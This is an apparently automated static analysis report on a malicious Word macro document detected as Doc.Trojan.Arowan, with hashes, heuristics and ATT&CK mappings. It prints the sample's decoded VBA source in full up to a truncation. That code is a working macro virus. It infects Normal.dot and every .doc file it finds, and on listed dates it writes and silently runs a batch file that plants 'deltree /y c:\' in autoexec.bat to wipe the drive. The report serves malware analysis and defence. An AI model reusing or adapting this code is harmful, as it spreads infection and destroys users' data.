Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9ddf13eb628087e9…

MALICIOUS

Office (OLE)

44.0 KB Created: 2001-07-06 02:53:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c3408cc2ff4a480c19ff6b5873d79764 SHA-1: db0df06cafaa4d802392523080ed4446093f281e SHA-256: 9ddf13eb628087e9dd663ab739ba3ba794f1b9a725e87d2c5482ac2af3ad4f5c
340 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The VBA macro contains an AutoOpen subroutine that executes when the document is opened. It attempts to create a file named 'Sony.dll' in the system directory and saves the current document as 'AROWANA.Doc' in the system directory. The macro also attempts to copy itself to the Normal.dot template. The presence of Shell() and CreateObject() calls, along with the ClamAV detection of 'Doc.Trojan.Arowan-1' and 'Win.Trojan.DelTree-7', strongly indicates a malicious downloader or dropper.

Heuristics 7

  • ClamAV: Doc.Trojan.Arowan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Arowan-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6803 bytes
SHA-256: e9787e216d54743e82f3e437efb4601526dd7408a08ba7224633c722e02b95fa
Detection
ClamAV: Win.Trojan.DelTree-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module3"
Sub autoOpen()

Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists("C:\windows\system\Sony.dll") = False Then

On Error Resume Next

With ActiveDocument.AttachedTemplate
            Application.OrganizerDelete _
                Source:="C:\Windows\Application Data\Microsoft\Modиles\Normal.dot", _
                Name:="Module3", _
                Object:=wdOrganizerObjectProjectItems
End With

On Error Resume Next

ActiveDocument.SaveAs ("c:\windows\system\AROWANA.Doc")

Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:="c:\windows\Application data\microsoft\modиles\normal.dot", _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems


Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\Windows\System\Sony.dll", True)
a.Close

Call test

On Error Resume Next

Else

Application.DisplayAlerts = wdAlertsMessageBox

On Error Resume Next

Application.OrganizerCopy Source:="C:\Windows\system\AROWANA.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems
Call dt
End If

End Sub
Sub test()
Dim fs As String
With Application.FileSearch
    .NewSearch
    .LookIn = "C:\Mes Documents"
    .SearchSubFolders = True
    .FileName = "*.doc"
    .MatchTextExactly = True
    .FileType = msoFileTypeAllFiles
End With

On Error Resume Next

With Application.FileSearch
    If .Execute() > 0 Then
        For i = 1 To .FoundFiles.Count
            Application.OrganizerCopy Source:="c:\windows\system\AROWANA.doc", _
            Destination:=.FoundFiles(i), _
            Name:="Module3", _
            Object:=wdOrganizerObjectProjectItems
         Next i
    Else
         End If
End With



End Sub
Sub AutoNew()

Application.OrganizerCopy Source:="C:\Windows\system\AROWANA.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module1", _
Object:=wdOrganizerObjectProjectItems

ActiveDocument.Save

End Sub
Sub destroye()
MsgBox "Au Revoir", vbOKOnly + vbExclamation
Set fst = CreateObject("Scripting.FileSystemObject")
Set a = fst.CreateTextFile("c:\Bie.bat", True)
a.writeline ("echo deltree /y c:\ > c:\autoexec.bat")
a.Close
MsgBox "Un bon conseil ne redemarrez plus jamais votre PC !", vbCritical + vbApplicationModal + vbOKOnly, "CONSEIL A SUIVRE"
Shell ("c:\bie.bat"), vbHide
Application.Quit
End Sub

Sub dt()
Dim dater As Date
dater = DateTime.Date

If dater = "9/01/01" Then
Call destroye
End If

If dater = "20/01/01" Then
Call destroye
End If

If dater = "21/01/01" Then
Call destroye
End If

If dater = "22/01/01" Then
Call destroye
End If

If dater = "23/01/01" Then
Call destroye
End If

If dater = "24/01/01" Then
Call destroye
End If

If dater = "25/01/01" Then
Call destroye
End If

If dater = "26/01/01" Then
Call destroye
End If

If dater = "29/01/01" Then
Call destroye
End If

If dater = "2/02/01" Then
Call destroye
End If

If dater = "3/02/01" Then
Call destroye
End If

If dater = "5/02/01" Then
Call destroye
End If

If dater = "6/02/01" Then
Call destroye
End If

If dater = "7/02/01" Then
Call destroye
End If

If dater = "8/02/01" Then
Call destroye
End If

If dater = "9/02/01" Then
Call destroye
End If

If dater = "10/02/01" Then
Call destroye
End If

If dater = "12/02/01" Then
Call destroye
End If

If dater = "14/02/01" Then
Call destroye
End If

If dater = "16/02/01" Then
Call destroye
End If

If dater = "18/02/01" Then
Call destroye
End If

If dater = "20/02/01" Then
Call destroye
End If

If dater = "22/02/01" Then
Call destroye
End If

If dater = "24/02/01" Then
Call destroye
End If

If dater = "26/02/01" Then
Call destroye
End If

If dater = "2
... (truncated)